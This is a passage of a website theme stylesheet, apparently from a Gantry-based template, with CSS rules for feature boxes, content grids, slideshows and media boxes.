  color: #4f953b;
}
.g-features2-particle.style4 .accent2 .g-features2-particle-icon {
  color: #282828;
}
.g-features2-particle.style5 .g-features2-particle-icon {
  float: left;
  font-size: 24px;
  margin-right: 0;
  color: #afafaf;
  width: 60px;
  height: 60px;
  line-height: 60px;
  text-align: center;
  margin-top: 5px;
  border: 1px solid;
  border-radius: 50%;
}
.g-features2-particle.style5 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  width: 60px;
  height: 60px;
}
.g-features2-particle.style5 .g-features2-particle-image img {
  border-radius: 50%;
  width: 60px;
  height: 60px;
}
.g-features2-particle.style5 .g-title-desc-container {
  margin-left: 75px;
}
.g-features2-particle.style5 .g-features2-particle-title {
  margin-bottom: 10px;
}
.g-features2-particle.style5 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
.g-features2-particle.style5 .accent2 .g-features2-particle-icon {
  color: #282828;
}
.g-image-features {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-image-features .g-grid {
  margin-bottom: 1.876rem;
}
.g-image-features .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-grid:last-child .g-block:last-child .g-image-features-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-image-features > .g-grid > .g-block {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    margin-bottom: 1.876rem;
  }
  .g-image-features > .g-grid > .g-block:last-child {
    margin-bottom: 0;
  }
}
.g-image-features .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-image-features .g-image-features-item {
  background: #ffffff;
  border: 1px solid #e2e2e2;
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.07);
  border-radius: 3px;
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-image-features-item {
    margin-bottom: 2.3445rem;
  }
}
.g-image-features .g-image-features-item.layout-right .g-image-features-image.uk-overlay {
  border-radius: 0 3px 3px 0;
}
.g-image-features .g-image-features-item.layout-right .g-image-features-image img {
  border-radius: 0 3px 3px 0;
}
.g-image-features .g-image-features-image {
  position: relative;
}
.g-image-features .g-image-features-image img {
  width: 100%;
  border-radius: 3px 0 0 3px;
}
.g-image-features .g-image-features-image .uk-overlay-icon:before {
  content: "";
}
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 3px 0 0 3px;
}
.g-image-features .g-image-features-image.uk-overlay img {
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-image-features .g-image-features-image:hover.uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-image-features .g-image-features-image .uk-overlay-panel {
  z-index: 4;
}
.g-image-features .g-image-features-content {
  padding: 20px;
}
.g-image-features .g-image-features-desc {
  margin: 0;
}
.g-image-features .g-image-features-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
.g-image-features .g-image-features-title a {
  color: #282828;
}
.g-image-features .g-image-features-title a:hover {
  color: #4f953b;
}
.g-image-features .g-bottom-info {
  margin-top: 15px;
}
.g-image-features .g-image-feature-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-feature-special {
    float: none;
  }
}
.g-image-features .g-image-feature-special i {
  margin-right: 5px;
}
.g-image-features .g-image-features-link {
  font-style: italic;
  float: right;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-features-link {
    float: none;
    margin-top: 5px;
  }
}
.g-image-features .g-image-features-link i {
  margin-left: 10px;
}
.g-image-features .no-special .g-image-features-link {
  float: none;
}
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-content-pro .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-content-pro .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
}
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 0.4rem;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-content-pro .g-info-container-style2 .g-content-pro-special, .g-content-pro .g-info-container-style2 .g-item-details, .g-content-pro-slider .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider .g-info-container-style2 .g-item-details, .g-content-pro-slideset .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset .g-info-container-style2 .g-item-details {
  color: #eee;
}
.g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
.g-content-pro .g-content-pro-special i, .g-content-pro-slider .g-content-pro-special i, .g-content-pro-slideset .g-content-pro-special i {
  margin-right: 5px;
}
.g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
  float: right;
  font-style: italic;
}
.g-content-pro .g-content-pro-link i, .g-content-pro-slider .g-content-pro-link i, .g-content-pro-slideset .g-content-pro-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
.g-content-pro .no-special .g-content-pro-link, .g-content-pro-slider .no-special .g-content-pro-link, .g-content-pro-slideset .no-special .g-content-pro-link {
  float: none;
}
.g-content-pro .no-link .g-content-pro-special, .g-content-pro-slider .no-link .g-content-pro-special, .g-content-pro-slideset .no-link .g-content-pro-special {
  float: none;
}
.g-content-pro .g-bottom-info, .g-content-pro-slider .g-bottom-info, .g-content-pro-slideset .g-bottom-info {
  margin-top: 15px;
}
.g-content-pro .g-item-details, .g-content-pro-slider .g-item-details, .g-content-pro-slideset .g-item-details {
  margin-top: 0.4rem;
  font-size: 90%;
  color: #c8c8c8;
}
.g-content-pro .g-item-details .date i, .g-content-pro-slider .g-item-details .date i, .g-content-pro-slideset .g-item-details .date i {
  margin-right: 5px;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #ffffff;
}
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
.g-content-pro .g-content-pro-image, .g-content-pro-slider .g-content-pro-image, .g-content-pro-slideset .g-content-pro-image {
  width: 100%;
  background-position: center;
  background-size: cover;
}
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
  width: 100%;
  height: 100%;
}
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 10px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-content-pro .g-info-container-style2 .g-article-details, .g-content-pro-slider .g-info-container-style2 .g-article-details, .g-content-pro-slideset .g-info-container-style2 .g-article-details {
  color: #eee;
}
.g-content-pro .g-article-details, .g-content-pro-slider .g-article-details, .g-content-pro-slideset .g-article-details {
  margin-top: 10px;
  font-size: 90%;
  color: #bbb;
}
.g-content-pro .g-article-details > span, .g-content-pro-slider .g-article-details > span, .g-content-pro-slideset .g-article-details > span {
  margin-right: 10px;
}
.g-content-pro .g-article-details > span:last-child, .g-content-pro-slider .g-article-details > span:last-child, .g-content-pro-slideset .g-article-details > span:last-child {
  margin-right: 0;
}
.g-content-pro .g-article-details > span i, .g-content-pro-slider .g-article-details > span i, .g-content-pro-slideset .g-article-details > span i {
  margin-right: 5px;
}
.g-content-pro .g-article-read-more, .g-content-pro-slider .g-article-read-more, .g-content-pro-slideset .g-article-read-more {
  margin-top: 15px;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #ffffff;
}
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-slideshow .uk-overlay-panel {
  padding: 25px;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
}
.g-slideshow .g-overlay-container {
  width: 75rem;
  margin-left: auto;
  margin-right: auto;
  padding-left: 25px !important;
  padding-right: 25px !important;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-slideshow .g-overlay-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .g-overlay-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.01rem) and (max-width: 47.99rem) {
  .g-slideshow .g-overlay-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-slideshow .g-overlay-container {
    width: 100%;
  }
}
.g-slideshow .nav-visible .uk-slidenav {
  opacity: 1;
}
.g-slideshow .g-slideshow-title {
  margin: 0 0 15px;
  color: #ffffff !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-title {
    margin: 0;
    font-size: 1rem;
  }
}
.g-slideshow .g-slideshow-desc {
  margin: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-desc {
    display: none;
  }
}
.g-slideshow .g-slideshow-desc a:not(.button) {
  color: #4f953b;
}
.g-slideshow .g-slideshow-desc a:not(.button):hover {
  text-decoration: underline;
}
.g-slideshow .g-slideshow-buttons {
  margin: 25px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-buttons {
    margin: 15px 0 0;
  }
}
.g-slideshow .g-slideshow-buttons .button {
  margin-right: 15px;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-slideshow .g-slideshow-buttons .button:hover {
  background: #5eb247;
  border-color: #5eb247;
}
.g-slideshow .g-slideshow-buttons .button:last-child {
  margin-right: 0;
}
.g-slideshow .g-slideshow-buttons .button > span {
  margin-right: 10px;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
.g-slideshow .g-slideshow-buttons .button.empty {
  background: none;
  border: 2px solid #4f953b;
  color: #4f953b;
}
.g-slideshow .g-slideshow-buttons .button.empty:hover {
  background: #4f953b;
  border-color: #4f953b;
  color: #ffffff;
}
.g-slideshow .uk-flex-center {
  text-align: center;
}
.g-slideshow .style2 {
  padding: 70px 0;
}
.g-slideshow .style2 .g-slideshow-title {
  padding: 15px 25px;
  background: #ffffff;
  color: #1a1a1a !important;
  font-size: 2rem;
  display: table;
  margin-bottom: 20px;
}
.g-slideshow .style2 .g-slideshow-desc {
  padding: 15px 20px;
  background: #1a1a1a;
  color: #ffffff !important;
  font-size: 1.2rem;
  display: table;
}
.g-slideshow .style2 .g-slideshow-buttons .button {
  font-size: 1.2rem;
}
.g-slideshow .style2 .g-slideshow-buttons .button.standard {
  background: #ffffff;
  border-color: #ffffff;
  color: #1a1a1a;
}
.g-slideshow .style2 .g-slideshow-buttons .button.standard:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #ffffff;
}
.g-slideshow .style2 .g-slideshow-buttons .button.empty {
  border-color: #ffffff;
  color: #ffffff;
}
.g-slideshow .style2 .g-slideshow-buttons .button.empty:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #ffffff;
}
.g-slideshow .style2.uk-flex-right .g-slideshow-title, .g-slideshow .style2.uk-flex-right .g-slideshow-desc {
  margin-left: auto;
}
.g-slideshow .style2.uk-flex-center .g-slideshow-title {
  margin: 0 auto 20px;
}
.g-slideshow .style2.uk-flex-center .g-slideshow-desc {
  margin: auto;
}
.g-slideshow .style3 .g-slideshow-title {
  font-size: 2rem;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.2rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.4rem;
  }
}
.g-slideshow .style3 .g-slideshow-desc {
  font-size: 17px;
  line-height: 30px;
}
.g-slideshow .dark-text .style3 .g-slideshow-title {
  color: #959595 !important;
}
.g-slideshow .dark-text .style3 .g-slideshow-desc {
  color: #959595;
}
.g-slideshow .uk-dotnav {
  margin: 0 0 35px;
}
.g-slideshow .g-slideshow-item iframe {
  pointer-events: auto !important;
}
.g-slideshow .slideshow-caption.uk-overlay-background {
  padding: 25px;
}
.g-slideshow .uk-overlay-left-short {
  -webkit-transform: translateX(-10%);
  -moz-transform: translateX(-10%);
  -ms-transform: translateX(-10%);
  -o-transform: translateX(-10%);
  transform: translateX(-10%);
}
.g-slideshow .uk-overlay-right-short {
  -webkit-transform: translateX(10%);
  -moz-transform: translateX(10%);
  -ms-transform: translateX(10%);
  -o-transform: translateX(10%);
  transform: translateX(10%);
}
.g-slideshow .uk-overlay-top-short {
  -webkit-transform: translateY(-10%);
  -moz-transform: translateY(-10%);
  -ms-transform: translateY(-10%);
  -o-transform: translateY(-10%);
  transform: translateY(-10%);
}
.g-slideshow .uk-overlay-bottom-short {
  -webkit-transform: translateY(10%);
  -moz-transform: translateY(10%);
  -ms-transform: translateY(10%);
  -o-transform: translateY(10%);
  transform: translateY(10%);
}
.g-slideshow .uk-overlay-scale {
  -webkit-transform: scale(0.8);
  -moz-transform: scale(0.8);
  -ms-transform: scale(0.8);
  -o-transform: scale(0.8);
  transform: scale(0.8);
}
.g-slideshow .uk-overlay-left-short, .g-slideshow .uk-overlay-right-short, .g-slideshow .uk-overlay-top-short, .g-slideshow .uk-overlay-bottom-short {
  -webkit-transition-duration: 0.5s;
  -moz-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.g-slideshow .uk-overlay-active .uk-active .uk-overlay-scale {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.g-slideshow audio, .g-slideshow canvas, .g-slideshow video {
  display: block;
}
#g-fullwidth .g-slideshow .g-content, .g-flushed .g-slideshow .g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
.g-main-feature {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-main-feature .g-main-feature-left .g-content {
  margin: 0 0.625rem 0 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-main-feature .g-main-feature-right .g-content {
  margin: 0 0 0 0.625rem;
  padding-top: 0;
  padding-bottom: 0;
}
.g-main-feature .g-main-feature-right.align-right {
  text-align: right;
}
.g-main-feature .g-main-feature-title {
  margin-top: -5px;
}
.g-main-feature .image-bottom {
  margin-bottom: -4.563rem;
}
.g-main-feature .g-main-feature-link {
  margin-top: 5px;
}
.g-main-feature .g-main-feature-link i {
  margin-right: 10px;
}
.g-main-feature .g-main-feature-link.g-button2 {
  margin-left: 25px;
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link.g-button2 {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link {
    display: block;
  }
}
.g-main-feature .g-main-feature-desc i {
  margin-right: 8px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
.g-media-box .g-grid {
  margin-bottom: 1.25rem;
}
.g-media-box .g-grid:last-child {
  margin-bottom: 0;
}
.g-media-box .g-grid .g-block {
  margin-right: 1.25rem;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-grid .g-block {
    margin-right: 0;
    margin-bottom: 1.25rem;
  }
}
.g-media-box .g-grid .g-block:last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-grid .g-block:last-child {
    margin-bottom: 0;
  }
}
.g-media-box .g-media-box-item .g-media-box-content {
  background: #ffffff;
  padding: 2rem;
  border: 1px solid #dddddd;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
  color: #959595;
  background: transparent;
